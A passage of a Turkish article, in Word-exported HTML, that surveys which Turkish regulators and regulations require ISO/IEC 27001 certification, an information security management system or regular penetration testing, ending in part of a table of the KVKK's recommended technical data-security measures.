yükümlü sertifikasına (YYS) sahip olmak isteyen tüzel kişilerin yapacakları
başvuruda ISO 27001 sertifikasının aslı veya düzenleyen kuruluş tarafından
onaylı örneğini ibraz etmeleri gerekmektedir.<o:p></o:p></div>
<h2>
</h2>
<h2>
Hazine ve Maliye Bakanlığı Gelir İdaresi Başkanlığı<o:p></o:p></h2>
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->19 Kasım 2019 tarihinde yayınlanan e-Belge Özel
Entegratörleri Bilgi Sistemleri Denetim Kılavuzunda yer aldığı üzere GİB’den
izin alan/alacak olan Özel Entegratör kuruluşlarının ISO/IEC 27001:2013 Bilgi
Güvenliği Yönetim Sistemi Belgesine sahip olma zorunluluğu bulunmaktadır. e-Belge
denildiğinde e-Fatura, e-İrsaliye, e-Bilet, e-Arşiv gibi belgeleri
kapsamaktadır. Aynı kılavuzda özel entegratörün yılda en az bir kez sızma testi
yaptırması gerektiği belirtilmiştir.<br />
<h2>
Ticaret Bakanlığı</h2>
<br />
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]-->Türkiye Cumhuriyeti Ticaret Bakanlığı, 6563
sayılı Elektronik Ticaretin Düzenlenmesi Hakkında Kanun ve ilgili mevzuat
kapsamında, Türkiye Odalar ve Borsalar Birliği'ni ticari elektronik ileti
izinlerinin ve şikâyet süreçlerinin yönetilebildiği ulusal bir platform
kurmakla görevlendirmiştir. İleti Yönetim Sistemi A.Ş., Türkiye Odalar ve
Borsalar Birliği tarafından bu amaçla hizmet vermek üzere kurulmuştur. 4 Ocak
2020 tarihinde Ticari İletişim ve Ticari Elektronik İletiler Hakkında
Yönetmelikte Değişiklik Yapılmasına Dair Yönetmelik yayınlanmıştır. Bu
yönetmelikte geçtiği üzere, Ticaret Bakanlığı tarafından ticari elektronik
ileti yönetim sistemini kurmakla yetkilendirilen Kuruluş (İleti Yönetim Sistemi
A.Ş.), ticari elektronik ileti gönderiminin aksamaması için gerekli teknik
tedbiri almak ve İYS’ye yönelik Bakanlık tarafından istenen diğer iş ve
işlemleri yürütmekle yükümlüdür. Bu kapsamda, İYS API (Application Programming
Interface) lisansı kullanım hakkı elde ederek kendi müşterilerine İYS
entegrasyon hizmeti sunan iş ortaklarının TÜRKAK onaylı ISO 27001 - Bilgi Güvenliği
Yönetim Sistemi Sertifikası’na sahip olmaları veya bu belgenin altı ay içinde
tamamlanacağını taahhüt etmeleri gerekmektedir.<o:p></o:p></div>
<br /></div>
<h2>
</h2>
<h2>
Ulaştırma ve Altyapı Bakanlığı<o:p></o:p></h2>
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->21 Haziran 2017 tarihinde yayınlanan KamuNet Ağına
Bağlanma ve KamuNet Ağının Denetimine İlişkin Usul ve Esaslar Hakkında Tebliğde
bahsedildiği üzere, KamuNet’e dâhil olan ya da olacak kamu kurumu ve kuruluşu
kurmuş olduğu BGYS için, TS ISO/IEC 27001 veya ISO/IEC 27001 standardına göre
belgesini almakla ve güncelliğini sağlamakla yükümlüdür. Aynı tebliğde yer
aldığı üzere KamuNet’e dâhil olan ya da olacak kamu kurumu ve kuruluşunun
KamuNet’in bağlı olduğu sistemler üzerinde sızma/penetrasyon testleri
gerçekleştirerek tespit edilen açıklıkların giderilmesi için çalışmalar yapması
gerekmektedir.<o:p></o:p></div>
<div class="MsoListParagraph" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<br /></div>
<div class="MsoNormal">
Bunların yanı sıra, bazı yönetmelik ve tebliğlerde de
doğrudan ISO/IEC 27001 sertifikasının alınması şart koşulmadığı halde bir BGYS kurulması,
teknik açıklıkların tespit edilmesi ya da risklerin yönetilmesi gibi konularda gereklilikler
belirtilmiştir. Bu gereklilikler ISO/IEC 27001 standardına uyumlu hale
gelindiğinde karşılanmış olacaktır diyebiliriz. Aşağıda BGYS kurulmasını
gerektiren ya da ISO/IEC 27001 standardıyla ilişkilendirilebilen tebliğ ve
yönetmeliklere yer verilmiştir. <o:p></o:p></div>
<h2>
</h2>
<h2>
Bankacılık Düzenleme ve Denetleme Kurumu<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->6493 sayılı Ödeme ve Menkul Kıymet Mutabakat
Sistemleri, Ödeme Hizmetleri ve Elektronik Para Kuruluşları Hakkında Kanunun 5.
maddesinde ödeme sistemi ve menkul kıymet mutabakat sistemi işleticisi olan
tüzel kişilerin yeterli risk yönetimine sahip olmaları ve bilgi güvenliği ve
güvenilirliğine dair tedbir almaları gerektiği belirtilmiştir. Kuruluşta BGYS
faaliyete geçirildiği takdirde risk yönetimi süreci işletiliyor ve bilgi
güvenliğine dair tedbirler hayata geçirilmiş olacaktır. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->14 Eylül 2007 tarihli Bankalarda Bilgi
Sistemleri Yönetiminde Esas Alınacak İlkelere İlişkin Tebliğ mevduat, katılım,
kalkınma ve yatırım bankalarını kapsamaktadır. Bu tebliğde bu bankalar için etkin
bir risk yönetimi yapılması, yeni projelerin getireceği risklerin yönetilmesi, verilerin
gizlilik, bütünlük ve ulaşılabilirliklerini sağlamaya yönelik tedbirlerin alınması,
verilerin hassasiyet derecelerine göre sınıflandırılması ve personelin güvenlik
konusunda farkındalık kazanması gibi hususları yerine getirmeleri gerektikleri
belirtilmiştir. Aynı zamanda bağımsız ekiplerce düzenli aralıklarla sızma testi
yaptırılması gerektiğine yer verilmiştir. ISO/IEC 27001 standardına uyumlu hale
gelindiğinde bu hususların tamamı yerine getirilmiş olur. Bu tebliğ 1 Temmuz
2020 tarihinde yürürlükten kalkacaktır. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->15 Mart 2020 tarihinde yayınlanan Bankaların
Bilgi Sistemleri ve Elektronik Bankacılık Hizmetleri Hakkında Yönetmelik
mevduat, katılım, kalkınma ve yatırım bankalarını kapsamaktadır. Bu
yönetmelikte bu bankaların bilgi varlıklarını sınıflandırarak varlık envanteri
hazırlamaları, risk yönetim süreci tesis etmeleri, farkındalığı artıracak
çalışmalar yapmaları, önemli projeler ve değişiklikler için bilgi güvenliği
gereksinimlerini belirlemeleri gerektiği belirtilmiştir. Aynı zamanda bilgi
güvenliği yönetim ve bilgi sistemleri süreklilik yönetim sistemlerinin ulusal
veya uluslararası standartları ya da en iyi uygulamaları referans almalarının
esas olduğu belirtilmiştir. Bu bankaların bağımsız ekiplere yılda en az bir
defa sızma testi yaptırmaları gerektiğine de yer verilmiştir. ISO/IEC 27001
standardına uyum süreci bu şartların tamamını kapsamaktadır. Bu yönetmelik 1
Temmuz 2020 tarihinde yürürlüğe girecektir. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->6 Nisan 2019 tarihinde yayınlanan Finansal
Kiralama, Faktoring ve Finansman Şirketlerinin Bilgi Sistemlerinin Yönetimine
ve Denetimine İlişkin Tebliğde bilgi güvenliği yönetim sürecinin tesis
edilmesi, personelin farkındalığının arttırılması, verilerin hassasiyet
derecelerine göre sınıflandırılması, 2 yılda bir sızma testi yaptırılması gibi
gerekliliklerden bahsedilmiştir. Aynı zamanda ISO/IEC 27001 standardına uyum
ile ilişkilendirilebilir bilgi sistemleri sürekliliğinin sağlanması, erişim
yönetimi yapılması gibi hususlar da mevcuttur. <o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l0 level1 lfo3; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Ödeme Kuruluşları ve Elektronik Para
Kuruluşlarının Bilgi Sistemlerinin Yönetimine ve Denetimine İlişkin Tebliğde kuruluşun
verileri güvenlik hassasiyet derecelerine göre sınıflandırmaları ve buna uygun
derecede güvenlik kontrolleri tesis etmeleri, bilgi güvenliği politikası ve
bilgi güvenliği yönetim süreci oluşturmaları, bağımsız ekiplere yılda en az bir
defa sızma testi yaptırmaları gerekmektedir. Bu tebliğ ödeme hizmeti sağlayan
ve gerçekleştiren kuruluşları ve elektronik para ihraç eden kuruluşları
kapsamaktadır. ISO/IEC 27001 standardına göre BGYS işletildiğinde gerekli
görülen süreçler sağlanmış olacaktır. <o:p></o:p></div>
<h2>
</h2>
<h2>
Bilgi Teknolojileri ve İletişim Kurumu<o:p></o:p></h2>
<div class="MsoListParagraph" style="mso-list: l1 level1 lfo4; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->13 Temmuz 2014 tarihli Elektronik Haberleşme
Sektöründe Şebeke ve Bilgi Güvenliği Yönetmeliği elektronik haberleşme hizmeti
sunan ve/veya elektronik haberleşme şebekesi sağlayan ve alt yapısını işleten
şirketleri kapsamaktadır. Bu işletmecilerin BGYS’yi kurmaları, uygulamaları ve
sürekliliğini sağlamaları gerekmektedir. Bunun yanı sıra varlık envanteri
oluşturma, risk değerlendirme ve işleme yapılması, bilgi güvenliğinin
farkındalığının arttırılması ve bilgi güvenliği olaylarının izlenmesi ve gözden
geçirilmesi gibi hususlar da ISO/IEC 27001 standardının uygulanmasıyla birlikte
yerine getirilecek gereklilikler arasında sayılabilir.<o:p></o:p></div>
<h2>
</h2>
<h2>
Enerji Piyasası Düzenleme Kurumu<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l7 level1 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Enerji Sektöründe Kullanılan Endüstriyel Kontrol
Sistemlerinde Bilişim Güvenliği Yönetmeliğine belirtildiği üzere EKS
(Endüstriyel Kontrol Sistemleri) Güvenlik Kontrolleri isimli bir rehber
yayınlanmıştır. Bu rehberdeki kontrollerin öneri mahiyetinde olduğuna yer
verilmiş, rehberin içinde de yazıldığı üzere EKS’lerin güvenliğinin
denetlenmesi için bir el kitabı olma niteliğindedir. Rehberde ISO/IEC 27001
standardı ile ilişkilendirilebilir erişim kontrolü, risk değerlendirme, belirli
aralıklarla sızma testi gerçekleştirilmesi, personel güvenliği ve bilgi
güvenliği programının planlanması hususları bulunmaktadır. Standardın getirdiği
gereklilikler, bu rehberde belirtilen güvenlik kontrolleri için büyük bir fayda
sağlayacaktır. Yönetmelikte belirtildiği üzere yükümlü kuruluşlar aşağıdaki
gibidir:<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l3 level2 lfo6; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Elektrik iletim lisansı sahibi,<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l3 level2 lfo6; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->OSB dağıtım lisansı sahipleri hariç olmak üzere elektrik
dağıtım lisansı sahibi,<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l3 level2 lfo6; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->OSB üretim lisansı sahibi hariç olmak üzere geçici
kabulü yapılmış ve işletmedeki kurulu gücü 100 MWe ve üzeri lisansa sahip her
bir elektrik üretim tesisi sahibi,<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l3 level2 lfo6; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Boru hattı ile iletim yapan doğal gaz iletim
lisansı sahibi,<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l3 level2 lfo6; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Sevkiyat kontrol merkezi kurmakla yükümlü doğal
gaz dağıtım lisansı sahibi, <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l3 level2 lfo6; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Doğal gaz depolama lisansı sahibi (LNG, yer altı
depolama),<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l3 level2 lfo6; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Ham petrol iletim lisansı sahibi,<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l3 level2 lfo6; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Rafinerici lisansı sahibi tüzel kişiler.<o:p></o:p></div>
<h2>
</h2>
<h2>
Kişisel Verileri Koruma Kurumu<o:p></o:p></h2>
<div class="MsoListParagraph" style="mso-list: l4 level1 lfo8; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Kurumun Ocak 2018’de yayınladığı Kişisel Veri
Güvenliği Rehberi (Teknik ve İdari Tedbirler) kişisel verileri işleyen gerçek
ve tüzel kişiler için siber güvenliğin sağlanması, kişisel veri güvenliğinin
takibi gibi konular üzerine öneriler sunmuştur. Bu rehberde belirtildiği üzere erişimin
sınırlandırılması, düzenli olarak zafiyet taramaları ve sızma testlerinin
yapılması, risk ve tehditlerin belirlenip buna uygun önlemler alınması,
farkındalık çalışmaları gibi hususlar ISO/IEC 27001 standardına uyumluluk ile
örtüşmektedir. Rehberde bulunan teknik tedbirler özet tablosu aşağıda
verilmiştir. Bu tablodaki teknik tedbirlerin, standardın Ek A kontrol
maddeleriyle olan benzerliği gözden kaçmamalıdır.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTable15Grid1LightAccent5" style="border-collapse: collapse; border: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;">
<tbody>
<tr>
<td colspan="3" style="border-bottom: solid #8EAADB 1.5pt; border: solid #B4C6E7 1.0pt; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-alt: solid #8EAADB 1.5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 153; mso-border-bottom-themetint: 153; mso-border-themecolor: accent5; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 453.1pt;" valign="top" width="566"><div align="center" class="MsoListParagraph" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto; mso-yfti-cnfc: 5; text-align: center;">
<b>Teknik
Tedbirler<o:p></o:p></b></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid #B4C6E7 1.0pt; mso-border-alt: solid #B4C6E7 .5pt; mso-border-themecolor: accent5; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 127.35pt;" valign="top" width="160"><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto; mso-yfti-cnfc: 4;">
Yetki Matrisi<o:p></o:p></div>
</td>
<td style="border-bottom: solid #B4C6E7 1.0pt; border-left: none; border-right: solid #B4C6E7 1.0pt; border-top: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 102; mso-border-left-alt: solid #B4C6E7 .5pt; mso-border-left-themecolor: accent5; mso-border-left-themetint: 102; mso-border-right-themecolor: accent5; mso-border-right-themetint: 102; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 6.0cm;" valign="top" width="212"><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto;">
Şifreleme<o:p></o:p></div>
</td>
<td style="border-bottom: solid #B4C6E7 1.0pt; border-left: none; border-right: solid #B4C6E7 1.0pt; border-top: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 102; mso-border-left-alt: solid #B4C6E7 .5pt; mso-border-left-themecolor: accent5; mso-border-left-themetint: 102; mso-border-right-themecolor: accent5; mso-border-right-themetint: 102; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 155.65pt;" valign="top" width="194"><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto;">
Yedekleme <o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid #B4C6E7 1.0pt; mso-border-alt: solid #B4C6E7 .5pt; mso-border-themecolor: accent5; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 127.35pt;" valign="top" width="160"><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto; mso-yfti-cnfc: 4;">
Yetki Kontrol <o:p></o:p></div>
</td>
<td style="border-bottom: solid #B4C6E7 1.0pt; border-left: none; border-right: solid #B4C6E7 1.0pt; border-top: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 102; mso-border-left-alt: solid #B4C6E7 .5pt; mso-border-left-themecolor: accent5; mso-border-left-themetint: 102; mso-border-right-themecolor: accent5; mso-border-right-themetint: 102; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 6.0cm;" valign="top" width="212"><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto;">
Sızma Testi<o:p></o:p></div>
</td>
<td style="border-bottom: solid #B4C6E7 1.0pt; border-left: none; border-right: solid #B4C6E7 1.0pt; border-top: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 102; mso-border-left-alt: solid #B4C6E7 .5pt; mso-border-left-themecolor: accent5; mso-border-left-themetint: 102; mso-border-right-themecolor: accent5; mso-border-right-themetint: 102; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 155.65pt;" valign="top" width="194"><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto;">
Güvenlik Duvarları<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid #B4C6E7 1.0pt; mso-border-alt: solid #B4C6E7 .5pt; mso-border-themecolor: accent5; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 127.35pt;" valign="top" width="160"><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto; mso-yfti-cnfc: 4;">
Erişim Logları<o:p></o:p></div>
</td>
<td style="border-bottom: solid #B4C6E7 1.0pt; border-left: none; border-right: solid #B4C6E7 1.0pt; border-top: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 102; mso-border-left-alt: solid #B4C6E7 .5pt; mso-border-left-themecolor: accent5; mso-border-left-themetint: 102; mso-border-right-themecolor: accent5; mso-border-right-themetint: 102; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 6.0cm;" valign="top" width="212"><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto;">
Saldırı Tespit ve Önleme Sistemleri<o:p></o:p></div>
</td>
<td style="border-bottom: solid #B4C6E7 1.0pt; border-left: none; border-right: solid #B4C6E7 1.0pt; border-top: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 102; mso-border-left-alt: solid #B4C6E7 .5pt; mso-border-left-themecolor: accent5; mso-border-left-themetint: 102; mso-border-right-themecolor: accent5; mso-border-right-themetint: 102; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 155.65pt;" valign="top" width="194"><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto;">
Güncel Anti-Virüs Sistemleri<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid #B4C6E7 1.0pt; mso-border-alt: solid #B4C6E7 .5pt; mso-border-themecolor: accent5; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 127.35pt;" valign="top" width="160"><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto; mso-yfti-cnfc: 4;">
Kullanıcı Hesap Yönetimi<o:p></o:p></div>
</td>
<td style="border-bottom: solid #B4C6E7 1.0pt; border-left: none; border-right: solid #B4C6E7 1.0pt; border-top: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 102; mso-border-left-alt: solid #B4C6E7 .5pt; mso-border-left-themecolor: accent5; mso-border-left-themetint: 102; mso-border-right-themecolor: accent5; mso-border-right-themetint: 102; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 6.0cm;" valign="top" width="212"><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto;">
Log Kayıtları<o:p></o:p></div>
</td>
<td rowspan="2" style="border-bottom: solid #B4C6E7 1.0pt; border-left: none; border-right: solid #B4C6E7 1.0pt; border-top: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 102; mso-border-left-alt: solid #B4C6E7 .5pt; mso-border-left-themecolor: accent5; mso-border-left-themetint: 102; mso-border-right-themecolor: accent5; mso-border-right-themetint: 102; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 155.65pt;" valign="top" width="194"><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto;">
Silme, Yok Etme veya Anonim Hale
Getirme<o:p></o:p></div>
</td>
</tr>
<tr>
<td style="border-top: none; border: solid #B4C6E7 1.0pt; mso-border-alt: solid #B4C6E7 .5pt; mso-border-themecolor: accent5; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 127.35pt;" valign="top" width="160"><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto; mso-yfti-cnfc: 4;">
Ağ Güvenliği<o:p></o:p></div>
</td>
<td style="border-bottom: solid #B4C6E7 1.0pt; border-left: none; border-right: solid #B4C6E7 1.0pt; border-top: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 102; mso-border-left-alt: solid #B4C6E7 .5pt; mso-border-left-themecolor: accent5; mso-border-left-themetint: 102; mso-border-right-themecolor: accent5; mso-border-right-themetint: 102; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 6.0cm;" valign="top" width="212"><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto;">
Veri Maskeleme <o:p></o:p></div>
</td>
</tr>
<tr>
